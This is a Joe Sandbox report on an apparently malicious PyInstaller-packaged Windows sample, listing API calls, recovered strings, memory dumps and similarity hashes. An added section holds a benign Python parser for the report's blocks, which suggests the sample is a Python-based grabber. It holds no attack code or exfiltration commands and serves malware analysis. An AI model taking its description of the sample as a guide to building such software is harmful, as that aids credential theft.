                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAF0F000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117242370.00007FFDFAF10000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117294434.00007FFDFAF12000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfae60000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 190073905-0
                                                                                                                                                                                                                                              • Opcode ID: bfa090c531bac24e46e178867b034455b2b04e74abd31691ae896f8f055f72f8
                                                                                                                                                                                                                                              • Instruction ID: 23d45c6cfb952ff7eef3566c951cbf40ad91b6494df43c4177ee712713469fc5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bfa090c531bac24e46e178867b034455b2b04e74abd31691ae896f8f055f72f8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E81C221F3C24386FB6CBB259470A796690AF95780F4489B5E92F473DEDE3EE8458700
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: -$:$f$p$p
                                                                                                                                                                                                                                              • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                              • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                              • Instruction ID: c4733eaa1329521d65f513c589a98c92650a635fbfeec5a90d75ea550f6378d3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A128163E0C2A386FB205F18D1546B976A1FB50752F888135E78B86EE4DF3CE980CB10
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: f$f$p$p$f
                                                                                                                                                                                                                                              • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                              • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                              • Instruction ID: ac11f2da6b373fe71ff394aa5867e5bdf766a2b15bf0cee618d3e2b85ee76662
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB129463E0C5A386FB205F1CE05467976A5FB40756F954071D79A86EE8DF7CE980CB00
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
Similarity
• API ID: 00007A463010
• String ID: %s %T already exists$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
Strings
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
APIs
• GetTempPathW.KERNEL32(?,?,00000000,00007FF6B7503CBB), ref: 00007FF6B7508704
• GetCurrentProcessId.KERNEL32(?,00000000,00007FF6B7503CBB), ref: 00007FF6B750870A
• CreateDirectoryW.KERNEL32(?,00000000,00007FF6B7503CBB), ref: 00007FF6B750874C
  • Part of subcall function 00007FF6B7508830: GetEnvironmentVariableW.KERNEL32(00007FF6B750388E), ref: 00007FF6B7508867
  • Part of subcall function 00007FF6B7508830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6B7508889
  • Part of subcall function 00007FF6B7518238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B7518251
  • Part of subcall function 00007FF6B7502810: MessageBoxW.USER32 ref: 00007FF6B75028EA
Strings
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
• String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
Similarity
• API ID: 00007B6570
• String ID: ..\s\ssl\ssl_ciph.c$SECLEVEL=$STRENGTH$ssl_cipher_process_rulestr
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
Similarity
• API ID: 00007E20033420ErrorLast
• String ID: %s/%s$..\s\ssl\ssl_cert.c$SSL_add_dir_cert_subjects_to_stack$SSL_add_file_cert_subjects_to_stack$calling OPENSSL_dir_read(%s)
• API String ID: 1442048445-502574948
APIs
• FreeLibrary.KERNEL32(?,?,?,00007FF6B751F0AA,?,?,000001B5FBF896E8,00007FF6B751AD53,?,?,?,00007FF6B751AC4A,?,?,?,00007FF6B7515F3E), ref: 00007FF6B751EE8C
• GetProcAddress.KERNEL32(?,?,?,00007FF6B751F0AA,?,?,000001B5FBF896E8,00007FF6B751AD53,?,?,?,00007FF6B751AC4A,?,?,?,00007FF6B7515F3E), ref: 00007FF6B751EE98
Strings
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• API String ID: 3013587201-537541572
APIs
• GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B7503706,?,00007FF6B7503804), ref: 00007FF6B7502C9E
• FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B7503706,?,00007FF6B7503804), ref: 00007FF6B7502D63
• MessageBoxW.USER32 ref: 00007FF6B7502D99
Strings
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: Message$CurrentFormatProcess
• String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
• API String ID: 3940978338-251083826
Strings
Memory Dump Source
• Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
Similarity
• API ID:
• String ID: $..\s\ssl\statem\extensions_srvr.c$HMAC$SHA2-256$tls_construct_stoc_cookie
• API String ID: 0-1087561517
Strings
Memory Dump Source
• Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
Similarity
• API ID:
• String ID: ..\s\ssl\ssl_rsa.c$SERVERINFO FOR $SERVERINFOV2 FOR $SSL_CTX_use_serverinfo_file
• API String ID: 0-2528746747
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF6B750DF7A,?,?,?,00007FF6B750DC6C,?,?,?,00007FF6B750D869), ref: 00007FF6B750DD4D
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF6B750DF7A,?,?,?,00007FF6B750DC6C,?,?,?,00007FF6B750D869), ref: 00007FF6B750DD5B
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF6B750DF7A,?,?,?,00007FF6B750DC6C,?,?,?,00007FF6B750D869), ref: 00007FF6B750DD85
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF6B750DF7A,?,?,?,00007FF6B750DC6C,?,?,?,00007FF6B750D869), ref: 00007FF6B750DDF3
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF6B750DF7A,?,?,?,00007FF6B750DC6C,?,?,?,00007FF6B750D869), ref: 00007FF6B750DDFF
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                                                                              • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                              • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                              • Instruction ID: 6e688795dbb874b520d03be46d44b84a0809813ed08d6bb98db52e5100d8b550
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7131C563B1EB42D1EE529B0AA4106B563A4FF48BA8F594535DF5DC73A0EF3CE4449310
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF6B750351A,?,00000000,00007FF6B7503F23), ref: 00007FF6B7502AA0
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                              • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                              • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                              • Instruction ID: 8c35499528c39134f5f1d509e0d18074a5e02f9d051e11ab1c8276c4dd5abcb8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 53218133A1CB8242E7209B59B8417EA63A4FB88784F400136FF8D93669EF7CD2458740
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 995526605-0
                                                                                                                                                                                                                                              • Opcode ID: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
                                                                                                                                                                                                                                              • Instruction ID: c57e1a10fdde354a7423a654366036f6bc738cf8d5e9c1db24e7c3ad9794fc4e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 31216237A0C68242EB108B59F544A7AA3B0FF957A4F500235EBAD93BF4EE7CE4458700
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2506987500-0
                                                                                                                                                                                                                                              • Opcode ID: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
                                                                                                                                                                                                                                              • Instruction ID: ecca1fa4048c1f0645fd4cf9537cc6e17f9bc88fb270afc802bfe2f958577f01
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A215022E4D66281F9656B2E5A5113952A35F44BB2F064734DB7EC7EF6DD2CA8408340
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                              • String ID: CONOUT$
                                                                                                                                                                                                                                              • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                              • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                              • Instruction ID: 7bb057d4a1b864632c54c1fa524d2138cc32d689d2c8113b2b7deee4b25e3809
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94119322B1CB4586E7608B1AE85432962A4FB88BE4F040238EB5EC77B4DF3CD8548740
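Added example, not Joe Sandbox output and not code from the analysed sample: a Python parser that turns the per-function summaries above into records, so call sites, image bases, snapshot files and similarity IDs can be grouped and searched across the whole report instead of read block by block. It assumes the layout shown above (a block opens at an "APIs" heading, items use "• " bullets, the headings are APIs / Strings / Memory Dump Source / Joe Sandbox IDA Plugin / Similarity); SAMPLE is constructed from two of the blocks above with the API argument lists abridged, and the "Download File" suffix it strips is page-widget residue, not report data. Two things worth pulling out of these particular blocks: the LoadLibraryExW / GetProcAddress / FreeLibrary sequence keyed on the "api-ms-" string is the pattern of a statically linked CRT resolving API-set forwarders, and "[PYI-%d:%s]" and "Warning [ANSI Fallback]" are, to my reading, PyInstaller bootloader messages, which fits a Python-based grabber packaged with PyInstaller; find_by_string locates such functions.

```python
"""Parse Joe Sandbox per-function summaries into records (added example, not Joe Sandbox code).
Assumes the block layout seen above: a function block opens at an "APIs" heading, uses "• "
bullets and the headings APIs / Strings / Memory Dump Source / Joe Sandbox IDA Plugin /
Similarity. SAMPLE is constructed, abridged from two of the report's blocks."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

BULLET = "• "
HEADINGS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "<Api>.<MODULE>(<args>), ref: <call-site address>"
API_RE = re.compile(r"^(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
# "Source File: <dump>.sdmp, Offset: <image base>, based on PE: true"
SOURCE_RE = re.compile(r"^Source File: (?P<dump>\S+), Offset: (?P<base>[0-9A-Fa-f]+), based on PE: ")


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)        # (api name, module, call-site address)
    source_dump: str = ""                           # .sdmp the code was lifted from
    image_base: int = 0                             # PE base that dump is relative to
    snapshot: str = ""                              # IDA plugin snapshot file
    similarity: dict = field(default_factory=dict)  # "API ID", "String ID", hashes, ...


def parse_report(text: str) -> list[FunctionRecord]:
    records: list[FunctionRecord] = []
    current, section = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith("Download File"):            # page-widget residue on "Associated" lines
            line = line[: -len("Download File")]
        if line in HEADINGS:
            if line == "APIs":                        # every function block starts with "APIs"
                current = FunctionRecord()
                records.append(current)
            section = line
            continue
        if current is None or not line.startswith(BULLET):
            continue
        body = line[len(BULLET):]
        if section == "APIs" and (m := API_RE.match(body)):
            current.apis.append((m["name"], m["module"], int(m["ref"], 16)))
        elif section == "Memory Dump Source" and (m := SOURCE_RE.match(body)):
            current.source_dump, current.image_base = m["dump"], int(m["base"], 16)
        elif section == "Joe Sandbox IDA Plugin" and body.startswith("Snapshot File: "):
            current.snapshot = body[len("Snapshot File: "):]
        elif section == "Similarity":                 # "API ID: ...", "Opcode Fuzzy Hash: ..."
            key, _, value = body.partition(":")
            current.similarity[key] = value.strip()
    return records


def report_strings(rec: FunctionRecord) -> list[str]:
    """Split the report's String ID on its '$' separator. Caveat: a string that itself ends
    in '$' (the report's own CONOUT$) loses that character, so treat the result as a hint."""
    return [s for s in rec.similarity.get("String ID", "").split("$") if s]


def find_by_string(records: list[FunctionRecord], needle: str) -> list[FunctionRecord]:
    """Functions whose recovered strings contain needle, e.g. the '[PYI-' bootloader prefix."""
    return [r for r in records if any(needle in s for s in report_strings(r))]


def apis_by_image(records: list[FunctionRecord]) -> dict[int, set[str]]:
    """Distinct API names called per image base: which loaded module does what."""
    out: dict[int, set[str]] = {}
    for r in records:
        out.setdefault(r.image_base, set()).update(name for name, _, _ in r.apis)
    return out


SAMPLE = """\
APIs
• LoadLibraryExW.KERNEL32(?,?,?,00007FF6B750DF7A), ref: 00007FF6B750DD4D
• GetLastError.KERNEL32(?,?,?,00007FF6B750DF7A), ref: 00007FF6B750DD5B
• LoadLibraryExW.KERNEL32(?,?,?,00007FF6B750DF7A), ref: 00007FF6B750DD85
• FreeLibrary.KERNEL32(?,?,?,00007FF6B750DF7A), ref: 00007FF6B750DDF3
• GetProcAddress.KERNEL32(?,?,?,00007FF6B750DF7A), ref: 00007FF6B750DDFF
Strings
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
• Instruction Fuzzy Hash: 7131C563B1EB42D1EE529B0AA4106B563A4FF48BA8F594535DF5DC73A0EF3CE4449310
APIs
• GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF6B750351A), ref: 00007FF6B7502AA0
Strings
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: CurrentProcess
• String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
• API String ID: 2050909247-2900015858
"""
```

Running parse_report over a full report gives one record per function block; find_by_string(records, "[PYI-") then returns the bootloader-message functions and apis_by_image shows which image base (the main PE at 7FF6B7500000 versus the module at 7FFE00760000 in the blocks above) calls which APIs.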
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
• Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                                              • String ID: ..\s\ssl\statem\statem_clnt.c$SHA2-256$resumption$tls_process_new_session_ticket
                                                                                                                                                                                                                                              • API String ID: 3568877910-1635961163
                                                                                                                                                                                                                                              • Opcode ID: b87feab1bb37d1f7e894d0b6f0c64973d7e3dc1ff34bf6278c2bc73ec1ca2133
                                                                                                                                                                                                                                              • Instruction ID: 8bc84e7e448ad9061fb9ed37595aea3efc8435766db97857e59cd6deae27dd6c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b87feab1bb37d1f7e894d0b6f0c64973d7e3dc1ff34bf6278c2bc73ec1ca2133
